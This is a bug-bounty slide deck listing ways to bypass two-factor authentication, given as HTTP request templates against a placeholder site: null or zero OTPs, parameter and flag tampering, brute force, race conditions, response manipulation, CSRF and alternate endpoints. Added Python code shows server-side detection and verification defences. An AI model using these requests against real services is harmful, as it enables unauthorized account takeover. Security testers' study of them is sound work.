Bypassing 2FA: Methods and Techniques

The document outlines various methods an attacker could try to bypass two-factor authentication (2FA) on a website, including: 1. Sending an empty or fixed value for the one-time password (OTP) parameter. 2. Manipulating request parameters like changing the 2FA enabled flag to false. 3. Appending extra headers or modifying the request to bypass 2FA checks. 4. Attempting to exploit vulnerabilities in the 2FA implementation through techniques like bruteforcing, race conditions or leveraging other accounts.

  • Introduction to 2FA Bypass
  • Sending Empty OTP
  • Inserting Zeros in OTP
  • Changing Boolean Values
  • Removing OTP Parameter
  • Appending X-Forwarded-For Header
  • Checking Old OTP Validity
  • Brute Force OTP
  • Race Condition Technique
  • Response Manipulation
  • Bypassing with OAuth
  • Using OTP from Another Account
  • Disabling 2FA with CSRF
  • Signing Up Without Verification
  • Exploiting API Endpoints
  • Generating Backup Codes
  • SOAP Endpoint Exploits
  • Using Confirmation Links
  • Summary of 2FA Bypass Methods
  • Conclusion and Thank You

2 Factor Authentication
Enter 6-Digit Code

Mahmoud M. Awali
@0xAwali
My Methodology

Try To Send An Empty OTP OR Set It To NULL, e.g. otp=null, To Bypass 2FA

POST /secondLogin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: [Link]
Origin: [Link]
Content-Length: Number

{"email":"me","pass":"****","otp":""}

Try To Insert Zeros In The OTP Parameter, e.g. 000000, To Bypass 2FA

POST /secondLogin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: [Link]
Origin: [Link]
Content-Length: Number

{"email":"me","pass":"****","otp":"000000"}

Always Compare Both Requests, When 2FA Is Enabled And When It Is Disabled, e.g. If There Is A Boolean Value Set To True When 2FA Is Enabled, Try To Change It To False To Bypass 2FA

POST /secondLogin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: [Link]
Origin: [Link]
Content-Length: Number

{"email":"me","pass":"****","2fa":false,"otp":"****"}

Enable 2FA, Then Try To Log In Without The OTP OR Remove The OTP Parameter; Sometimes The Enabled 2FA Doesn't Work

POST /secondLogin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: [Link]
Origin: [Link]
Content-Length: Number

{"email":"me","pass":"****"}

Try To Append An X-Forwarded-For Header, e.g. X-Forwarded-For: 127.0.0.1, To Bypass 2FA

POST /secondLogin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
X-Forwarded-For: 127.0.0.1
Origin: [Link]
Content-Length: Number

{"email":"me","pass":"****","otp":"*****"}

Try To Figure Out If An Old OTP Is Still Valid OR The OTP Is Fixed; If YES, There Is An Issue Here

POST /secondLogin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: [Link]
Origin: [Link]
Content-Length: Number

{"email":"me","pass":"****","otp":"Old-OTP"}

Try To Brute Force The OTP To Bypass 2FA

POST /secondLogin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: [Link]
Origin: [Link]
Content-Length: Number

{"email":"me","pass":"****","otp":"FUZZ"}

If There Is An OTP Code, Try To Brute Force It By Using The Race Condition Technique OR The IP Rotate Burp Suite Extension

POST /resetPassword HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

email=me&pass=*****&otp=*****
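From the defender's side, the brute-force, race-condition and IP-rotation attempts described above show up in authentication logs as a burst of OTP failures against one account. The following detector is an added example, not part of this deck; it assumes a key=value log format, and the sample lines and thresholds in the code are constructed.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample lines in an assumed key=value format (not from any real system).
# alice: four failures in two seconds from rotating IPs, then a success; bob: one typo, then success.
SAMPLE_LOG = """\
2024-05-01T10:00:00Z user=alice src=198.51.100.7 path=/secondLogin result=otp_fail
2024-05-01T10:00:00Z user=alice src=198.51.100.8 path=/secondLogin result=otp_fail
2024-05-01T10:00:00Z user=alice src=198.51.100.9 path=/secondLogin result=otp_fail
2024-05-01T10:00:01Z user=alice src=198.51.100.10 path=/secondLogin result=otp_fail
2024-05-01T10:00:02Z user=alice src=198.51.100.11 path=/secondLogin result=otp_ok
2024-05-01T10:05:00Z user=bob src=203.0.113.5 path=/secondLogin result=otp_fail
2024-05-01T10:05:20Z user=bob src=203.0.113.5 path=/secondLogin result=otp_ok
"""
LINE_RE = re.compile(r"^(\S+) user=(\S+) src=(\S+) path=\S+ result=(\S+)$")
FAIL_THRESHOLD = 4   # failures per account inside WINDOW_SECONDS (assumed policy value)
WINDOW_SECONDS = 60
BURST_THRESHOLD = 3  # requests for one account inside one second: race-condition pattern

def parse(log_text):
    """Yield (timestamp, user, src, result); lines that do not match the format are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ"), m.group(2), m.group(3), m.group(4)

def detect(log_text):
    """Return {user: {"reasons": [...], "sources": [...]}} for accounts showing OTP abuse patterns."""
    events = defaultdict(list)
    for ts, user, src, result in parse(log_text):
        events[user].append((ts, src, result))
    alerts = {}
    for user, evs in events.items():
        reasons = []
        fails = sorted(ts for ts, _, r in evs if r == "otp_fail")
        # Sliding window over failure times, keyed by account rather than IP, so rotation cannot hide it
        for i, start in enumerate(fails):
            if sum(1 for t in fails[i:] if (t - start).total_seconds() <= WINDOW_SECONDS) >= FAIL_THRESHOLD:
                reasons.append("otp_bruteforce")
                break
        # Several requests for one account in the same second is the race-condition signature
        if max(Counter(ts for ts, _, _ in evs).values()) >= BURST_THRESHOLD:
            reasons.append("otp_burst")
        if reasons and any(r == "otp_ok" for _, _, r in evs):
            reasons.append("success_after_burst")   # the guess may have landed: escalate this one
        if reasons:
            alerts[user] = {"reasons": reasons, "sources": sorted({s for _, s, _ in evs})}
    return alerts
```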

Enter A Wrong OTP Code, Then Try To Manipulate The Response, Changing It To The Response Of The Correct OTP Code, To Bypass 2FA

HTTP/1.1 200 OK
Access-Control-Allow-Origin: [Link]
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Content-Length: length

{
"code" : "correct otp",
"token" : "Random String"
}

Try To Log In With OAuth If There Is 2FA When Entering Email And Password, To Bypass 2FA

Steps To Reproduce:

1 - Log In With Valid Email And Password
2 - You Will Be Asked For The OTP
3 - Try To Log In With OAuth
4 - You Will Access Your Account Without 2FA

Try To Use The OTP Of Another Account, e.g. Your Second Account, To Bypass 2FA

POST /secondLogin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: [Link]
Origin: [Link]
Content-Length: Number

{"email":"me","pass":"****","otp":"Your-OTP"}
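The empty, null, zero-filled and missing OTP, the client-side 2fa flag, the X-Forwarded-For header, old or fixed codes, brute force and another account's OTP all come down to how the server verifies the second factor. The verifier below is an added example, not the deck's or any vendor's code; the Account model, the lockout and TTL values and the six-digit format are assumptions.

```python
import hmac
import threading
import time
from dataclasses import dataclass, field
from typing import Optional

MAX_ATTEMPTS = 5        # wrong codes before the account's second step locks (assumed policy)
OTP_TTL_SECONDS = 300   # a code older than this is dead even if never used (assumed policy)

@dataclass
class Account:
    email: str
    mfa_enabled: bool                      # the only source of truth for "is 2FA required"
    current_otp: Optional[str] = None      # the code the server issued for THIS account
    otp_issued_at: float = 0.0
    failed_attempts: int = 0
    lock: threading.Lock = field(default_factory=threading.Lock)

def issue_otp(account, code, now):
    """Server-side issuance: a fresh code replaces any older one, so old codes never stay valid."""
    account.current_otp, account.otp_issued_at = code, now

def verify_second_factor(account, body, now=None):
    """Return 'ok', 'rejected' or 'locked'. Only server-held state decides: the request body's
    "2fa" flag, headers such as X-Forwarded-For, and whatever the client does with the
    response are never consulted."""
    now = time.time() if now is None else now
    if not account.mfa_enabled:
        return "ok"
    submitted = body.get("otp")
    # A missing key, null, "" or a non-6-digit string is simply a non-match; "000000" is a
    # well-formed guess and is compared like any other value
    well_formed = isinstance(submitted, str) and len(submitted) == 6 and submitted.isdigit()
    with account.lock:  # check, compare and count as one atomic step: parallel requests serialize here
        if account.failed_attempts >= MAX_ATTEMPTS:
            return "locked"
        fresh = account.current_otp is not None and now - account.otp_issued_at <= OTP_TTL_SECONDS
        if well_formed and fresh and hmac.compare_digest(account.current_otp, submitted):
            account.current_otp = None       # single use: replaying the same code fails
            account.failed_attempts = 0
            return "ok"
        account.failed_attempts += 1
        return "rejected"
```

Because the code is bound to the account object the session belongs to, a code issued to a different account never matches, and the lock is what turns twenty parallel guesses into at most MAX_ATTEMPTS counted attempts.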

Try To Disable 2FA With CSRF, e.g. Disable 2FA In Account One, Then Use This Request To Disable 2FA In Account Two By Using A CSRF PoC

POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: [Link]
Origin: [Link]
Content-Length: Number

{"action":"disable_2fa"}

If There Isn't Email Verification, Try To Sign Up With The Victim's Email, Log In With That Email AND Password, Then Enable 2FA

POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: [Link]
Origin: [Link]
Content-Length: Number

{"action":"enable_2fa"}

Try To Figure Out Other Endpoints That Do The Same Action But Do Not Require 2FA, e.g. API Endpoints, To Bypass 2FA

POST /apiLogin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: [Link]
Origin: [Link]
Content-Length: Number

{"email":"me","pass":"****"}

If There Is An Endpoint To Generate Backup Codes, Try To POST To It Directly, e.g. POST /generateBackup, After Inserting Email And Password

Steps To Reproduce:

1 - Log In With Valid Email And Password
2 - Provide A Wrong OTP Code
3 - Capture The Request With Burp Suite
4 - Change The Request To POST /generateBackup HTTP/1.1
5 - Change The Body To {"action":"backup_codes"}

Try To Use A SOAP Endpoint To Bypass 2FA, e.g. If There Is An Endpoint That Accepts SOAP, Try To Send A SOAP Body With A Valid Email AND Password But Without The OTP Code

POST /secondLogin HTTP/1.1
Host: www.company.com
Content-Type: application/xml
Content-Length: Number

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<email>me</email>
<pass>*******</pass>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
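The OAuth, API endpoint, backup-code, CSRF and SOAP slides all rely on a second login path, or a sensitive action, that is not behind the same 2FA gate as the main form. The session model below is an added example, not taken from the deck, of one gate shared by every first-factor path and every sensitive endpoint; the stage names, the paths and the X-CSRF-Token header are assumptions.

```python
import secrets
from dataclasses import dataclass, field

@dataclass
class Account:
    email: str
    mfa_enabled: bool

@dataclass
class Session:
    account: Account
    stage: str = "anonymous"           # anonymous -> password_ok -> mfa_complete
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))

def primary_auth_succeeded(session):
    """Shared by every first-factor path: form login, OAuth callback, /apiLogin, the SOAP endpoint.
    None of them can reach mfa_complete on its own while the account has 2FA turned on."""
    session.stage = "mfa_complete" if not session.account.mfa_enabled else "password_ok"
    return session.stage

def second_factor_succeeded(session):
    """Called only after the server-side OTP check passed; there is no path from anonymous."""
    if session.stage != "password_ok":
        return False
    session.stage = "mfa_complete"
    return True

def handle(session, method, path, body, headers):
    """Router for the sensitive endpoints named in the deck. Returns (status, reason)."""
    if session.stage != "mfa_complete":
        return 401, "second factor not completed"   # /generateBackup with only a password stops here
    if method != "POST":
        return 405, "method not allowed"
    # State-changing settings need a per-session token that a cross-site page cannot read,
    # so a request replayed from another origin (the CSRF PoC) lacks it
    if path == "/setting" and headers.get("X-CSRF-Token") != session.csrf_token:
        return 403, "csrf token missing or wrong"
    if path == "/setting" and body.get("action") == "disable_2fa":
        session.account.mfa_enabled = False
        return 200, "2fa disabled"
    if path == "/generateBackup" and body.get("action") == "backup_codes":
        return 200, "backup codes issued"
    return 404, "unknown action"
```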

Try To Sign Up, Then Try To Use Your Email Confirmation Link Multiple Times If It Doesn't Expire, To Bypass 2FA

Steps To Reproduce:

1 - Sign Up With Email
2 - Click On The Confirmation Link
3 - Enable 2FA
4 - After 24 Hours, Click Again On The Confirmation Link
5 - Check Whether There Is 2FA OR Not

Source: Hack3rScr0lls tweet, #BugBounty #BugBountyTip

Thank You

Mahmoud M. Awali
@0xAwali
